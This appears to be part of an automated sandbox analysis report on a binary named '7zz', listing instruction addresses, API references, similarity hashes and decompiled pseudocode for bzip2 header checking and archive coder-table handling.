                                                                                                                                    0x0043144c
                                                                                                                                    0x00431428
                                                                                                                                    0x0043142b
                                                                                                                                    0x00000000
                                                                                                                                    0x0043142b
                                                                                                                                    0x004313c4
                                                                                                                                    0x0043145e
                                                                                                                                    0x0043145e
                                                                                                                                    0x00431464
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004312f9
                                                                                                                                    0x004312f9
                                                                                                                                    0x004312ff
                                                                                                                                    0x00431304
                                                                                                                                    0x0043130c
                                                                                                                                    0x0043130c
                                                                                                                                    0x0043130f
                                                                                                                                    0x00431310
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004312dd
                                                                                                                                    0x004312dd
                                                                                                                                    0x004312e5
                                                                                                                                    0x004312ea
                                                                                                                                    0x004312eb
                                                                                                                                    0x00000000
                                                                                                                                    0x004312dd

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00431203
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00431802
                                                                                                                                      • Part of subcall function 0040F5DB: __EH_prolog.LIBCMT ref: 0040F5E0
                                                                                                                                      • Part of subcall function 0042B864: __EH_prolog.LIBCMT ref: 0042B869
                                                                                                                                      • Part of subcall function 00428A47: __EH_prolog.LIBCMT ref: 00428A4C
                                                                                                                                      • Part of subcall function 00428510: __EH_prolog.LIBCMT ref: 00428515
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004317A9
                                                                                                                                      • Part of subcall function 0043353F: __EH_prolog.LIBCMT ref: 00433544
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$FreeString
                                                                                                                                    • String ID: )
                                                                                                                                    • API String ID: 397689101-2427484129
                                                                                                                                    • Opcode ID: f13ee92bd55a1d418d98c2f0526cca70d0f101d57160b5bfbc254031a7a02aaa
                                                                                                                                    • Instruction ID: 3cd5448d51800a9ea3fb603d1c019fc727f39b37be062062b600306fe1c5b3de
                                                                                                                                    • Opcode Fuzzy Hash: f13ee92bd55a1d418d98c2f0526cca70d0f101d57160b5bfbc254031a7a02aaa
                                                                                                                                    • Instruction Fuzzy Hash: 06036C30900259DFDF15DFA5C984BEDBBB0AF18308F14809EE849A7292DB789E85CF55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004465E0 Relevance: 4.0, Strings: 3, Instructions: 282COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E004465E0(void* __ecx) {
				intOrPtr _t93;
				signed int _t97;
				void* _t113;
				void* _t119;
				void* _t206;
				void* _t208;
				void* _t209;
				void* _t214;
				void* _t215;
				char* _t216;
				intOrPtr _t220;
				void* _t222;
				void* _t223;
				void* _t224;

				_t214 = __ecx;
				 *((intOrPtr*)(__ecx + 0x6fe8)) =  *((intOrPtr*)(_t224 + 8));
				_t93 = E00446260(__ecx);
				if(_t93 != 0) {
					L39:
					return _t93;
				} else {
					_t215 = 0;
					if( *((intOrPtr*)(__ecx + 0x7010)) <= 0) {
						L9:
						_t216 =  *((intOrPtr*)(_t224 + 0x28));
						_t206 = 0;
						 *_t216 = 0;
						do {
							 *((char*)(_t224 + _t206 + 0x1c)) = E00445F70();
							_t206 = _t206 + 1;
						} while (_t206 < 4);
						if( *((char*)(_t224 + 0x1c)) != 0x42 ||  *((char*)(_t224 + 0x1d)) != 0x5a ||  *((char*)(_t224 + 0x1e)) != 0x68) {
							L38:
							return 0;
						}
						_t97 =  *(_t224 + 0x1f);
						if(_t97 <= 0x30 || _t97 > 0x39) {
							goto L38;
						}
						 *_t216 = 1;
						 *((intOrPtr*)(_t214 + 0x6fe4)) = 0;
						_t220 = ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4) * 4) * 4 << 5) - 0x493e00;
						if( *((intOrPtr*)(_t214 + 0x7014)) == 0) {
							_t207 = _t214 + 0x138;
							 *((intOrPtr*)(_t224 + 0x18)) =  *((intOrPtr*)(_t214 + 0x6fec));
							asm("cdq");
							asm("sbb edx, ebx");
							asm("adc edx, ecx");
							_t93 = L00447BA0(_t214,  *((intOrPtr*)(_t214 + 0x140)) -  *((intOrPtr*)(_t214 + 0x148)) - (0x20 -  *((intOrPtr*)(_t214 + 0x138)) >> 3) +  *((intOrPtr*)(_t214 + 0x150)),  *((intOrPtr*)(_t214 + 0x6fec)));
							if(_t93 == 0) {
								while(1) {
									_t93 = E00446500(_t214, _t224 + 0x2c, _t224 + 0x1c);
									if(_t93 != 0) {
										goto L39;
									}
									if( *((intOrPtr*)(_t224 + 0x2c)) != 0) {
										goto L38;
									}
									_t146 =  *((intOrPtr*)(_t224 + 0x18));
									_push(_t224 + 0x28);
									_push(_t224 + 0x14);
									_push(_t224 + 0x14);
									_push(_t214 + 0x47b4);
									_push(_t214 + 0x160);
									_push(_t220);
									_t93 = L004469A0(_t207,  *( *((intOrPtr*)(_t224 + 0x18))));
									if(_t93 != 0) {
										goto L39;
									} else {
										L004470F0( *_t146,  *((intOrPtr*)(_t224 + 0x10)));
										if( *((intOrPtr*)(_t224 + 0x28)) == 0) {
											_push(_t214 + 0x10);
											_t205 =  *((intOrPtr*)(_t224 + 0x14));
											_push( *((intOrPtr*)(_t224 + 0x14)));
											_t113 = L00447150( *_t146 + 0x400,  *((intOrPtr*)(_t224 + 0x14)));
										} else {
											_t205 =  *((intOrPtr*)(_t224 + 0x10));
											_push(_t214 + 0x10);
											_push( *((intOrPtr*)(_t224 + 0x14)));
											_t113 = L00447240( *_t146 + 0x400,  *((intOrPtr*)(_t224 + 0x10)));
										}
										if(_t113 !=  *((intOrPtr*)(_t224 + 0x1c))) {
											return 1;
										} else {
											asm("cdq");
											asm("sbb edx, ebx");
											asm("adc edx, ecx");
											_t119 = L00447BA0(_t214,  *((intOrPtr*)(_t207 + 8)) -  *((intOrPtr*)(_t207 + 0x10)) - (0x20 -  *_t207 >> 3) +  *((intOrPtr*)(_t207 + 0x18)), _t205);
											if(_t119 == 0) {
												continue;
											} else {
												return _t119;
											}
										}
									}
									goto L40;
								}
							}
							goto L39;
						} else {
							 *((intOrPtr*)(_t214 + 0x7018)) = 0;
							 *((char*)(_t214 + 0x701e)) = 0;
							 *((char*)(_t214 + 0x701d)) = 0;
							 *((char*)(_t214 + 0x701c)) = 0;
							L00467B30(_t214 + 0x7020);
							L00467B10( *((intOrPtr*)(_t214 + 0x6fec)) + 0x18);
							 *((intOrPtr*)(_t214 + 0x7028)) = 0;
							 *((intOrPtr*)(_t214 + 0x7024)) = 0;
							_t150 = _t214 + 0x6ff4;
							 *((intOrPtr*)(_t214 + 0x702c)) = _t220;
							L00467B10(_t214 + 0x6ff4);
							_t208 = 0;
							if( *((intOrPtr*)(_t214 + 0x7010)) > 0) {
								_t223 = 0;
								do {
									L00467AC0( *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x6fec)) + _t223 + 0x10)));
									_t208 = _t208 + 1;
									_t223 = _t223 + 0x11c;
								} while (_t208 <  *((intOrPtr*)(_t214 + 0x7010)));
							}
							L00467B30(_t150);
							L00467B10(_t214 + 0x7020);
							_t209 = 0;
							if( *((intOrPtr*)(_t214 + 0x7010)) > 0) {
								_t222 = 0;
								do {
									_t197 =  *((intOrPtr*)(_t214 + 0x6fec));
									L00467AC0( *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x6fec)) + _t222 + 0x14)));
									_t209 = _t209 + 1;
									_t222 = _t222 + 0x11c;
								} while (_t209 <  *((intOrPtr*)(_t214 + 0x7010)));
							}
							L00467B30(_t214 + 0x7020);
							_t93 =  *((intOrPtr*)(_t214 + 0x7028));
							if(_t93 != 0) {
								goto L39;
							} else {
								_t93 =  *((intOrPtr*)(_t214 + 0x7024));
								if(_t93 != 0) {
									goto L39;
								} else {
									asm("cdq");
									asm("sbb edx, edi");
									asm("adc edx, ebx");
									return L00447BA0(_t214,  *((intOrPtr*)(_t214 + 0x140)) -  *((intOrPtr*)(_t214 + 0x148)) - (0x20 -  *((intOrPtr*)(_t214 + 0x138)) >> 3) +  *((intOrPtr*)(_t214 + 0x150)), _t197);
								}
							}
						}
					} else {
						 *((intOrPtr*)(_t224 + 0x2c)) = 0;
						while(1) {
							_t197 =  *((intOrPtr*)(_t224 + 0x2c));
							_t213 =  *((intOrPtr*)(_t214 + 0x6fec)) +  *((intOrPtr*)(_t224 + 0x2c));
							if(E00445E90( *((intOrPtr*)(_t214 + 0x6fec)) +  *((intOrPtr*)(_t224 + 0x2c))) == 0) {
								break;
							}
							if( *((intOrPtr*)(_t214 + 0x7014)) == 0) {
								L8:
								_t215 = _t215 + 1;
								 *((intOrPtr*)(_t224 + 0x2c)) =  *((intOrPtr*)(_t224 + 0x2c)) + 0x11c;
								if(_t215 <  *((intOrPtr*)(_t214 + 0x7010))) {
									continue;
								} else {
									goto L9;
								}
							} else {
								_t93 = L00467B30(_t213 + 0x10);
								if(_t93 != 0) {
									goto L39;
								} else {
									_t93 = L00467B30(_t213 + 0x14);
									if(_t93 != 0) {
										goto L39;
									} else {
										_t93 = L00467B30(_t213 + 0x18);
										if(_t93 != 0) {
											goto L39;
										} else {
											goto L8;
										}
									}
								}
							}
							goto L40;
						}
						return 0x8007000e;
					}
				}
				L40:
			}

















                                                                                                                                    0x004465ea
                                                                                                                                    0x004465ed
                                                                                                                                    0x004465f3
                                                                                                                                    0x004465fc
                                                                                                                                    0x00446994
                                                                                                                                    0x00446994
                                                                                                                                    0x00446602
                                                                                                                                    0x00446608
                                                                                                                                    0x0044660c
                                                                                                                                    0x00446680
                                                                                                                                    0x00446680
                                                                                                                                    0x00446684
                                                                                                                                    0x00446686
                                                                                                                                    0x0044668a
                                                                                                                                    0x00446691
                                                                                                                                    0x00446695
                                                                                                                                    0x00446696
                                                                                                                                    0x004466a0
                                                                                                                                    0x0044698b
                                                                                                                                    0x00000000
                                                                                                                                    0x0044698b
                                                                                                                                    0x004466bc
                                                                                                                                    0x004466c2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004466d5
                                                                                                                                    0x004466d9
                                                                                                                                    0x004466f8
                                                                                                                                    0x00446700
                                                                                                                                    0x0044685d
                                                                                                                                    0x0044686a
                                                                                                                                    0x00446872
                                                                                                                                    0x0044687b
                                                                                                                                    0x00446882
                                                                                                                                    0x00446888
                                                                                                                                    0x0044688f
                                                                                                                                    0x00446895
                                                                                                                                    0x004468a1
                                                                                                                                    0x004468a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004468b4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004468ba
                                                                                                                                    0x004468c6
                                                                                                                                    0x004468cb
                                                                                                                                    0x004468d2
                                                                                                                                    0x004468d9
                                                                                                                                    0x004468da
                                                                                                                                    0x004468dd
                                                                                                                                    0x004468e0
                                                                                                                                    0x004468e7
                                                                                                                                    0x00000000
                                                                                                                                    0x004468ed
                                                                                                                                    0x004468f3
                                                                                                                                    0x004468fe
                                                                                                                                    0x0044692b
                                                                                                                                    0x0044692c
                                                                                                                                    0x00446930
                                                                                                                                    0x00446931
                                                                                                                                    0x00446900
                                                                                                                                    0x00446904
                                                                                                                                    0x0044690b
                                                                                                                                    0x0044690c
                                                                                                                                    0x00446915
                                                                                                                                    0x00446915
                                                                                                                                    0x0044693a
                                                                                                                                    0x00446988
                                                                                                                                    0x0044693c
                                                                                                                                    0x0044694f
                                                                                                                                    0x00446958
                                                                                                                                    0x0044695f
                                                                                                                                    0x00446965
                                                                                                                                    0x0044696c
                                                                                                                                    0x00000000
                                                                                                                                    0x00446979
                                                                                                                                    0x00446979
                                                                                                                                    0x00446979
                                                                                                                                    0x0044696c
                                                                                                                                    0x0044693a
                                                                                                                                    0x00000000
                                                                                                                                    0x004468e7
                                                                                                                                    0x00446895
                                                                                                                                    0x00000000
                                                                                                                                    0x00446706
                                                                                                                                    0x0044670c
                                                                                                                                    0x00446712
                                                                                                                                    0x00446719
                                                                                                                                    0x00446720
                                                                                                                                    0x00446727
                                                                                                                                    0x00446735
                                                                                                                                    0x0044673a
                                                                                                                                    0x00446740
                                                                                                                                    0x00446746
                                                                                                                                    0x0044674c
                                                                                                                                    0x00446754
                                                                                                                                    0x0044675f
                                                                                                                                    0x00446763
                                                                                                                                    0x00446765
                                                                                                                                    0x00446767
                                                                                                                                    0x00446771
                                                                                                                                    0x0044677c
                                                                                                                                    0x0044677d
                                                                                                                                    0x00446783
                                                                                                                                    0x00446767
                                                                                                                                    0x00446789
                                                                                                                                    0x00446794
                                                                                                                                    0x0044679f
                                                                                                                                    0x004467a3
                                                                                                                                    0x004467a5
                                                                                                                                    0x004467a7
                                                                                                                                    0x004467a7
                                                                                                                                    0x004467b1
                                                                                                                                    0x004467bc
                                                                                                                                    0x004467bd
                                                                                                                                    0x004467c3
                                                                                                                                    0x004467a7
                                                                                                                                    0x004467cd
                                                                                                                                    0x004467d2
                                                                                                                                    0x004467da
                                                                                                                                    0x00000000
                                                                                                                                    0x004467e0
                                                                                                                                    0x004467e0
                                                                                                                                    0x004467e8
                                                                                                                                    0x00000000
                                                                                                                                    0x004467ee
                                                                                                                                    0x00446815
                                                                                                                                    0x0044681d
                                                                                                                                    0x00446821
                                                                                                                                    0x00446833
                                                                                                                                    0x00446833
                                                                                                                                    0x004467e8
                                                                                                                                    0x004467da
                                                                                                                                    0x0044660e
                                                                                                                                    0x0044660e
                                                                                                                                    0x00446612
                                                                                                                                    0x00446618
                                                                                                                                    0x0044661c
                                                                                                                                    0x00446627
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00446635
                                                                                                                                    0x00446667
                                                                                                                                    0x00446671
                                                                                                                                    0x0044667a
                                                                                                                                    0x0044667e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00446637
                                                                                                                                    0x0044663a
                                                                                                                                    0x00446641
                                                                                                                                    0x00000000
                                                                                                                                    0x00446647
                                                                                                                                    0x0044664a
                                                                                                                                    0x00446651
                                                                                                                                    0x00000000
                                                                                                                                    0x00446657
                                                                                                                                    0x0044665a
                                                                                                                                    0x00446661
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00446661
                                                                                                                                    0x00446651
                                                                                                                                    0x00446641
                                                                                                                                    0x00000000
                                                                                                                                    0x00446635
                                                                                                                                    0x00446842
                                                                                                                                    0x00446842
                                                                                                                                    0x0044660c
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorEventLastReset
                                                                                                                                    • String ID: B$Z$h
                                                                                                                                    • API String ID: 1621066496-418080759
                                                                                                                                    • Opcode ID: 31eb4e5eb83f84a862abec244540b5fd79ff3231d1edc22ba3dc5a5c688854da
                                                                                                                                    • Instruction ID: 230a258f7045333de16a7656bf94cdb6ffb83da81a8c701ada6b5a21721b5eb4
                                                                                                                                    • Opcode Fuzzy Hash: 31eb4e5eb83f84a862abec244540b5fd79ff3231d1edc22ba3dc5a5c688854da
                                                                                                                                    • Instruction Fuzzy Hash: 05A126717047018BD724DF39C890AABB7E1AF85308F45092EE5AA83341DB39F94DCB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004285AD Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 379COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E004285AD(void* __ecx) {
				signed int _t160;
				intOrPtr _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				intOrPtr _t175;
				void* _t178;
				intOrPtr* _t188;
				signed int _t194;
				signed int _t196;
				intOrPtr* _t199;
				signed int _t202;
				signed int* _t205;
				intOrPtr _t211;
				signed int _t215;
				void* _t225;
				void* _t226;
				signed int _t240;
				signed int _t241;
				void* _t242;
				void* _t243;
				signed int _t244;
				void* _t245;
				intOrPtr _t246;
				signed int _t247;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				signed int _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				void* _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t305;
				void* _t307;
				intOrPtr _t308;
				void* _t309;
				signed int _t310;
				void* _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				void* _t317;
				void* _t319;

				L0046B890(0x476ae2, _t319);
				_t317 = __ecx;
				_t305 = 0;
				if( *((char*)(__ecx + 0x110)) == 0) {
					_t250 =  *(__ecx + 0x24);
					if(_t250 != 0) {
						__eflags = _t250;
						 *(_t319 - 0x18) = 0;
						 *(_t319 - 0x14) = 0;
						 *(_t319 - 0x10) = 0;
						if(_t250 > 0) {
							do {
								_t303 =  *(_t319 - 0x10);
								__eflags =  *(_t317 + 0x38);
								_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t303 * 4));
								_t314 =  *((intOrPtr*)(_t211 + 0x20));
								_t246 =  *((intOrPtr*)(_t211 + 0x24));
								 *((intOrPtr*)(_t319 - 0x20)) = _t314;
								if( *(_t317 + 0x38) == 0) {
									__eflags = _t303 - _t250 - 1;
									if(__eflags >= 0) {
										_t315 = _t317 + 0x94;
										E00408767(_t315, __eflags, 0);
										_t314 =  *((intOrPtr*)(_t319 - 0x20));
										 *( *(_t315 + 0xc)) =  *(_t319 - 0x14);
									} else {
										L0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t246,  *(_t319 - 0x14));
									}
									_t215 = 1;
									__eflags = _t314 - _t215;
									 *(_t319 - 0x1c) = _t215;
									if(_t314 > _t215) {
										do {
											E00415C6D(_t317 + 0x94,  *(_t319 - 0x1c) +  *(_t319 - 0x14));
											 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 1;
											__eflags =  *(_t319 - 0x1c) - _t314;
										} while ( *(_t319 - 0x1c) < _t314);
									}
								}
								 *(_t319 - 0x18) =  *(_t319 - 0x18) + _t246;
								 *(_t319 - 0x14) =  *(_t319 - 0x14) + _t314;
								L0042389F(_t317 + 0x58, _t246, _t314);
								_t250 =  *(_t317 + 0x24);
								 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
								__eflags =  *(_t319 - 0x10) - _t250;
							} while ( *(_t319 - 0x10) < _t250);
							_t305 = 0;
							__eflags = 0;
						}
						_t160 =  *(_t317 + 0x38);
						__eflags = _t160 - _t305;
						if(_t160 != _t305) {
							 *(_t319 - 0x10) =  *(_t319 - 0x10) & 0x00000000;
							__eflags = _t160;
							if(_t160 > 0) {
								_t65 = _t319 - 0x1c;
								 *_t65 =  *(_t319 - 0x1c) & 0x00000000;
								__eflags =  *_t65;
								do {
									_t278 = 0;
									_t205 =  *((intOrPtr*)(_t317 + 0x3c)) +  *(_t319 - 0x1c);
									_t244 =  *_t205;
									__eflags = _t244;
									if(_t244 > 0) {
										_t302 =  *((intOrPtr*)(_t317 + 0x64));
										do {
											_t278 = _t278 +  *_t302;
											_t302 = _t302 + 8;
											_t244 = _t244 - 1;
											__eflags = _t244;
										} while (_t244 != 0);
									}
									_t313 = _t205[2];
									_t301 = _t205[1] + _t278;
									_t245 = 0;
									__eflags = _t313;
									if(_t313 > 0) {
										_t281 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
										__eflags = _t281;
										do {
											_t245 = _t245 +  *_t281;
											_t281 = _t281 + 8;
											_t313 = _t313 - 1;
											__eflags = _t313;
										} while (_t313 != 0);
									}
									L0042389F(_t317 + 0x6c, _t301, _t205[3] + _t245);
									 *(_t319 - 0x10) =  *(_t319 - 0x10) + 1;
									 *(_t319 - 0x1c) =  *(_t319 - 0x1c) + 0x10;
									__eflags =  *(_t319 - 0x10) -  *(_t317 + 0x38);
								} while ( *(_t319 - 0x10) <  *(_t317 + 0x38));
							}
							_t312 = 0;
							__eflags =  *(_t319 - 0x14);
							if( *(_t319 - 0x14) > 0) {
								do {
									_t276 =  *(_t317 + 0x74);
									_t299 = 0;
									__eflags = _t276;
									if(_t276 <= 0) {
										L31:
										_t299 = _t299 | 0xffffffff;
										__eflags = _t299;
									} else {
										_t202 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
										__eflags = _t202;
										while(1) {
											__eflags =  *_t202 - _t312;
											if( *_t202 == _t312) {
												goto L32;
											}
											_t299 = _t299 + 1;
											_t202 = _t202 + 8;
											__eflags = _t299 - _t276;
											if(_t299 < _t276) {
												continue;
											} else {
												goto L31;
											}
											goto L32;
										}
									}
									L32:
									__eflags = _t299 - 0xffffffff;
									if(_t299 == 0xffffffff) {
										E00415C6D(_t317 + 0x94, _t312);
									}
									_t312 = _t312 + 1;
									__eflags = _t312 -  *(_t319 - 0x14);
								} while (_t312 <  *(_t319 - 0x14));
							}
						}
						_t307 = 0;
						__eflags =  *(_t319 - 0x18);
						if( *(_t319 - 0x18) > 0) {
							do {
								_t274 =  *(_t317 + 0x74);
								_t298 = 0;
								__eflags = _t274;
								if(_t274 <= 0) {
									L40:
									_t298 = _t298 | 0xffffffff;
									__eflags = _t298;
								} else {
									_t199 =  *((intOrPtr*)(_t317 + 0x78));
									while(1) {
										__eflags =  *_t199 - _t307;
										if( *_t199 == _t307) {
											goto L41;
										}
										_t298 = _t298 + 1;
										_t199 = _t199 + 8;
										__eflags = _t298 - _t274;
										if(_t298 < _t274) {
											continue;
										} else {
											goto L40;
										}
										goto L41;
									}
								}
								L41:
								__eflags = _t298 - 0xffffffff;
								if(_t298 == 0xffffffff) {
									E00415C6D(_t317 + 0x80, _t307);
								}
								_t307 = _t307 + 1;
								__eflags = _t307 -  *(_t319 - 0x18);
							} while (_t307 <  *(_t319 - 0x18));
						}
						__eflags =  *(_t317 + 0x88);
						if( *(_t317 + 0x88) == 0) {
							 *(_t319 - 0x1c) = 1;
							L0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x8c))));
						while(1) {
							_t163 = E00424159(_t317 + 0x58, _t162, _t319 - 0x1c, _t319 - 0x10);
							_t254 =  *(_t319 - 0x1c);
							_t308 = 0;
							__eflags = _t254;
							if(_t254 <= 0) {
								goto L50;
							}
							_t196 =  *((intOrPtr*)(_t317 + 0x64)) + 4;
							__eflags = _t196;
							do {
								_t308 = _t308 +  *_t196;
								_t196 = _t196 + 8;
								_t254 = _t254 - 1;
								__eflags = _t254;
							} while (_t254 != 0);
							L50:
							_t255 =  *(_t317 + 0x74);
							_t296 = 0;
							__eflags = _t255;
							if(_t255 <= 0) {
								L54:
								_t164 = _t163 | 0xffffffff;
								__eflags = _t164;
							} else {
								_t194 =  *((intOrPtr*)(_t317 + 0x78)) + 4;
								__eflags = _t194;
								while(1) {
									__eflags =  *_t194 - _t308;
									if( *_t194 == _t308) {
										break;
									}
									_t296 = _t296 + 1;
									_t194 = _t194 + 8;
									__eflags = _t296 - _t255;
									if(_t296 < _t255) {
										continue;
									} else {
										goto L54;
									}
									goto L55;
								}
								_t164 = _t296;
							}
							L55:
							__eflags = _t164;
							if(_t164 >= 0) {
								_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x78)) + _t164 * 8));
								continue;
							}
							_t256 =  *(_t317 + 0x9c);
							_t297 = 0;
							__eflags = _t256;
							if(_t256 > 0) {
								_t188 =  *((intOrPtr*)(_t317 + 0xa0));
								while(1) {
									__eflags =  *_t188 - _t308;
									if(__eflags == 0) {
										break;
									}
									_t297 = _t297 + 1;
									_t188 = _t188 + 4;
									__eflags = _t297 - _t256;
									if(_t297 < _t256) {
										continue;
									} else {
									}
									goto L64;
								}
								_t243 = _t317 + 0x94;
								 *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x94)) + 4))(_t297, 1);
								E00408767(_t243, __eflags, 0);
								 *((intOrPtr*)( *((intOrPtr*)(_t243 + 0xc)))) = _t308;
							}
							L64:
							__eflags =  *((char*)(_t317 + 0x48));
							if( *((char*)(_t317 + 0x48)) != 0) {
								_t310 =  *(_t317 + 0x9c);
								_t241 = 0;
								__eflags = _t310;
								 *(_t319 - 0x1c) = _t310;
								if(_t310 > 0) {
									do {
										L0042389F(_t317 + 0x6c,  *(_t319 - 0x18) + _t241,  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0xa0)) + _t241 * 4)));
										_t241 = _t241 + 1;
										__eflags = _t241 - _t310;
									} while (_t241 < _t310);
								}
								E0040862D();
								_t242 = 0;
								__eflags = _t310;
								if(_t310 > 0) {
									 *(_t319 - 0x18) = _t319 - 0x44;
									do {
										E00404AD0(_t319 - 0x44, 4);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 0x48) =  *(_t319 - 0x48) & 0x00000000;
										_t175 = 1;
										 *((intOrPtr*)(_t319 - 0x2c)) = _t175;
										 *((intOrPtr*)(_t319 - 0x28)) = _t175;
										 *(_t319 - 4) = 2;
										_push(_t319 - 0x4c);
										 *((intOrPtr*)(_t319 - 0x4c)) = 0x6f10701;
										E00428BB4(_t317 + 0x1c);
										_t178 = 1;
										L0042389F(_t317 + 0x58, _t178, _t178);
										E00415C6D(_t317 + 0x94,  *(_t319 - 0x14) + _t242);
										 *(_t319 - 0x44) = 0x47b178;
										 *(_t319 - 4) = 3;
										E0040862D();
										 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
										E00408604(_t319 - 0x44);
										_t242 = _t242 + 1;
										__eflags = _t242 -  *(_t319 - 0x1c);
									} while (_t242 <  *(_t319 - 0x1c));
								}
							}
							goto L70;
						}
					} else {
						if( *((char*)(__ecx + 0x48)) == 0) {
							 *(_t319 - 0x1c) = 1;
							L0046B8F4(_t319 - 0x1c, 0x47e128);
						}
